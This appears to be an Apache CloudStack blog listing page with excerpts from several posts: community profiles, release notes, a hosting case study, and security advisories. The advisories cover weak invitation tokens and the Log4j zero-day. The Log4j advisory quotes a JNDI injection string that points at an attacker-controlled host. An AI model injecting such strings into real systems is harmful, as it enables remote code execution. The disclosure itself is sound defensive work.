Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker who knows the project ID and knows that the invite has been sent could generate time-deterministic tokens and try them by brute force before the legitimate recipient accepts the invite.
Meet the Community - Slavka Peleva
The Apache CloudStack Community is an ever-growing and rapidly developing community of people all around the globe committed to open-source technology. We are a welcoming society for new contributors and people keen on technology. This blog series introduces recent CloudStack Committers and PMC members. Learn more about our tech society!
Meet Slavka Peleva from StorPool Storage. Slavka is a software developer and was announced as a CloudStack Committer at the end of 2021. She has been part of the CloudStack community for the last 3 years and is excited to work on new features and capabilities to improve the open-source cloud management solution.
Apache CloudStack LTS Maintenance Release 4.16.1.0
Apache CloudStack Terraform Provider v0.4.0 Release
Apache CloudStack is proven to be one of the most scalable, free and open-source cloud computing operating systems for large-scale private, public, and hybrid clouds. Terraform is an open-source infrastructure as code software tool that provides a consistent CLI workflow to manage resources in many cloud services.
Cloud IaaS Predictions for 2022 from the Apache CloudStack Community
It's the beginning of the new year, and here the Apache CloudStack community shares its predictions about the state of open-source technology and the future of Cloud/IaaS. While some well-established trends (such as the migration to hybrid cloud environments and containerization) will continue in 2022, the potential for disruption caused by the ongoing pandemic will drive IT to accelerated change and improvement.
Meet the Community - David Jumani
Meet David Jumani - a Software Engineer and a Committer to the Apache CloudStack Project. David studied Computer Science and Engineering, and after graduation he worked at some of the biggest virtualization and networking companies (such as VMware, Cisco and General Electric), developing cloud and on-premise applications such as an incident correlation engine (which draws relationships from monitoring events). He is based in India, was a national rugby player, dislikes coffee and enjoys trekking and going on long rides.
Meet the Community - Pearl Dsilva
Meet Pearl Dsilva – one of the CloudStack Committers. Learn more about her!
CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)
On 9th December 2021, a new zero-day vulnerability in Apache Log4j was reported. It is now tracked under CVE-2021-44228: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
The CVE-2021-44228 vulnerability is classified at the highest severity level and allows an attacker to execute arbitrary code by injecting a substring of the form "${jndi:ldap://some.attacker-controlled.site/}" into a logged message. Apache Log4j 2.x is reported to be affected because it performs a lookup (string substitution) using the JNDI protocol whenever the "${jndi:...}" string is found within a message parameter.
IKOULA Simplifies the Management of Large-Scale Cloud Infrastructure with CloudStack and XCP-ng
The French specialist in web hosting, dedicated servers, and cloud computing IKOULA announced a joint case study with the leading open-source cloud management software CloudStack. For the management of their cloud environment, IKOULA decided to choose the open-source way by combining the power of CloudStack with the simplicity of the open-source hypervisor XCP-ng. The turnkey combination was carefully selected following the long-term company strategy to guarantee a constant product evolution, reliability, and simplicity for their customers. As a result, IKOULA is now among the most innovative cloud and managed services providers in Europe, with an extensive portfolio of cloud solutions. Moreover, a large number of customers use their CloudStack-orchestrated infrastructure to deploy memory-oriented and storage-oriented VMs or Kubernetes clusters.